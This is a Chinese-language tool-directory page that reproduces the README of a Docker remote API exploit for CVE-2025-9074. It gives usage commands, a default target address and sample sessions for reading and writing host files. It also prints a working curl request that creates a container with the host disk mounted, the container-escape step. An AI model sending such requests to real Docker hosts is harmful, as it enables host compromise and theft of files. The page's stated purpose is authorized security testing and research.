Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-9074-Docker-Exploit — 一个功能强大的 Docker 远程 API 漏洞利用工具,用于 CVE-2025-9074 漏洞的安全研究和测试。 | Kitploit
工具/GitHubGitHub/shaoshi17/cve-2025-9074-docker-exploit
容器安全漏洞分析漏洞利用渗透测试云安全红队容器逃逸
GitHubshaoshi17/cve-2025-9074-docker-exploit

CVE-2025-9074-Docker-Exploit

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

一个功能强大的 Docker 远程 API 漏洞利用工具,用于 CVE-2025-9074 漏洞的安全研究和测试。

查看仓库
127个月前尚未审核

CVE-2025-9074 Docker 容器命令执行工具

一个功能强大的 Docker 远程 API 漏洞利用工具,用于 CVE-2025-9074 漏洞的安全研究和测试。

核心优势

✅ 全自动容器生命周期管理:自动创建临时容器,操作完成后自动清理,不留痕迹
✅ 智能路径处理:自动识别并转换 Windows 路径为 Docker 挂载格式
✅ 全自动化操作流程:无需手动输入复杂命令,菜单式交互,一键完成文件操作
✅ 跨平台兼容:完美支持 Windows 和 Linux 系统

部分功能效果图

image

功能特性

  • 容器操作

    • 查看运行中的容器
    • 查看所有容器(包括停止的)
    • 创建新容器
    • 停止容器
    • 删除容器
    • 单次命令执行
    • 交互式终端(需要 docker 库)
  • 镜像管理

    • 查看本地镜像
    • 拉取新镜像
    • 删除镜像
  • 宿主机文件操作

    • 上传文件到宿主机
    • 从宿主机下载文件
    • 读取宿主机文件内容
    • 向宿主机写入文件
    • 自动处理 Windows Docker Desktop 路径映射

漏洞说明

CVE-2025-9074 是 Docker 远程 API 的一个安全漏洞,攻击者可以通过未授权访问 Docker API 来:

  • 执行任意命令
  • 创建容器并挂载宿主机磁盘
  • 实现容器逃逸
  • 读取/写入宿主机文件

环境要求

  • Python 3.6+

安装依赖

使用 requirements.txt 安装所有依赖:

root@kitploit:~
pip install -r requirements.txt

或手动安装:

root@kitploit:~
pip install requests docker websocket-client

使用方法

基本用法

直接运行脚本,使用默认 Docker API 地址:

root@kitploit:~
python CVE-2025-9074-docker-exploit.py

自定义 Docker API 地址

root@kitploit:~
python CVE-2025-9074-docker-exploit.py -u http://192.168.1.100:2375

命令行参数

root@kitploit:~
python CVE-2025-9074-docker-exploit.py [选项]

选项:
  -u, --url URL         Docker API 地址(默认: http://192.168.65.7:2375)

功能详解

容器操作

  1. 查看运行中的容器:显示所有正在运行的容器列表
  2. 查看所有容器:显示所有容器(包括已停止的)
  3. 创建新容器:使用指定镜像创建新容器
  4. 停止容器:停止运行中的容器
  5. 删除容器:删除容器(可强制删除)
  6. 单次命令执行:在容器中执行单条命令
  7. 交互式终端:进入容器的交互式 shell(需要 docker 库)

使用交互式终端

  1. 运行脚本后选择 "1. 容器操作"
  2. 选择 "1. 查看运行中的容器"
  3. 输入容器序号选择容器
  4. 选择 "2. 交互式终端 (需要 docker 库)"
  5. 输入 shell 命令(默认: /bin/sh)
  6. 开始交互式操作

镜像管理

  1. 查看镜像:列出所有本地镜像
  2. 拉取镜像:从 Docker Hub 拉取新镜像
  3. 删除镜像:删除本地镜像

宿主机文件操作

上传文件到宿主机

root@kitploit:~
1. 上传文件到宿主机
请输入本地文件路径: /path/to/local/file.txt
请输入宿主机目标目录: D:/temp
请输入目标文件名 (留空则使用原文件名): 

从宿主机下载文件

root@kitploit:~
2. 从宿主机下载文件
请输入宿主机文件路径: D:/temp/file.txt
请输入本地保存路径: /tmp

读取宿主机文件内容

root@kitploit:~
3. 读取宿主机文件内容
请输入宿主机文件路径: D:/temp/file.txt

向宿主机写入文件

root@kitploit:~
4. 向宿主机写入文件
请输入宿主机目标目录: D:/temp
请输入文件内容: Hello, World!

Windows Docker Desktop 路径映射

本工具自动处理 Windows Docker Desktop 的路径映射:

Windows 路径Docker 挂载路径

支持的输入格式:

  • D:\ 或 D:/
  • D:\temp 或 D:/temp
  • "D:\file.txt"(带引号)
  • 'D:/file.txt'(带引号)

安全注意事项

⚠️ 重要提示:

  1. 仅用于授权测试:本工具仅用于已授权的安全测试和教育目的
  2. 法律合规:使用前请确保获得目标系统的明确授权
  3. 隔离环境:建议在隔离的测试环境中使用
  4. 权限限制:Windows Docker Desktop 需要以管理员身份运行才能写入 C 盘
  5. 不要滥用:未经授权使用本工具可能违反法律法规

技术原理

容器逃逸

通过 Docker API 创建容器并挂载宿主机磁盘:

root@kitploit:~
curl -X POST "http://<target>:2375/containers/create" \
  -H "Content-Type: application/json" \
  -d '{
    "Image": "python:3.11.7",
    "Cmd": ["sleep", "999d"],
    "HostConfig": {
      "Binds": ["/mnt/host/d:/tmp"]
    },
    "Tty": true
  }'

文件读写

通过在容器中执行命令来读写宿主机文件:

root@kitploit:~
# 写入文件
echo "content" > /tmp/file.txt

# 读取文件
cat /tmp/file.txt

故障排除

容器创建失败 (500 错误)

  • 检查 Docker API 是否可访问
  • 确认路径格式是否正确
  • 验证镜像是否存在

文件写入失败

  • Windows Docker Desktop 需要以管理员身份运行
  • 检查目标目录的权限设置

交互式终端无法启动

  • 确保已安装 docker 库:pip install docker websocket-client
  • 检查终端是否支持交互模式

开发和测试

运行测试

root@kitploit:~
python CVE-2025-9074-docker-exploit.py

代码结构

root@kitploit:~
CVE-2025-9074-docker-exploit.py
├── 容器管理函数
│   ├── get_containers()
│   ├── display_containers()
│   ├── create_container()
│   ├── stop_container()
│   └── delete_container()
├── 镜像管理函数
│   ├── get_images()
│   ├── display_images()
│   ├── pull_image()
│   └── remove_image()
├── 宿主机文件操作函数
│   ├── upload_file_to_host()
│   ├── download_file_from_host()
│   ├── read_file_from_host()
│   └── write_file_to_host()
└── 工具函数
    ├── normalize_host_path()
    ├── create_container_with_mount()
    ├── start_container()
    └── stop_and_remove_container()

贡献

欢迎提交 Issue 和 Pull Request!

许可证

本项目仅供教育和安全研究使用。

免责声明

本工具仅用于授权的安全测试和教育目的。使用者需自行承担使用本工具的所有责任和风险。作者不对任何滥用或未经授权使用本工具的行为负责。

参考资料

  • CVE-2025-9074 漏洞详情
  • Docker Remote API 文档
  • Windows Docker Desktop 路径映射规则
下载工具
D:\/mnt/host/d
D:\temp/mnt/host/d/temp
C:\Windows/mnt/host/c/Windows
C:\Users\test/mnt/host/c/Users/test